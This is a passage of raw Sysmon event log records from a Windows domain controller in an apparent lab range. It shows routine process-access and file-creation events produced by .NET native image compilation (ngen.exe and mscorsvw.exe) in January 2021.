M32\ntdll.dll+51791 
10341000x80000000000000005748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:56.047{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9114-6005-7A01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:56.047{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9114-6005-7A01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-8301-00000000A301}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.891{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-8301-00000000A301}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:57.891{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-8301-00000000A301}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-8201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.859{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-8201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.859{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-8201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:57.828{59A5CD1D-9115-6005-8101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\109c-0\Microsoft.GroupPolicy.Management.dll2021-01-18 13:45:57.828 10341000x80000000000000005773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.656{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-8101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.641{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-8101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:57.641{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-8101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-8001-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.594{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-8001-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.594{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-8001-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:57.578{59A5CD1D-9115-6005-7F01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1290-0\Microsoft.GroupPolicy.Management.Interop.dll2021-01-18 13:45:57.578 10341000x80000000000000005766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.438{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-7F01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.422{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-7F01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:57.422{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-7F01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.359{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-7E01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.344{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-7E01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.344{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-7E01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:57.328{59A5CD1D-9115-6005-7D01-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\374-0\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll2021-01-18 13:45:57.328 10341000x80000000000000005759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.250{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-7D01-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.250{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-7D01-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:57.250{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-7D01-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.203{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-7C01-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
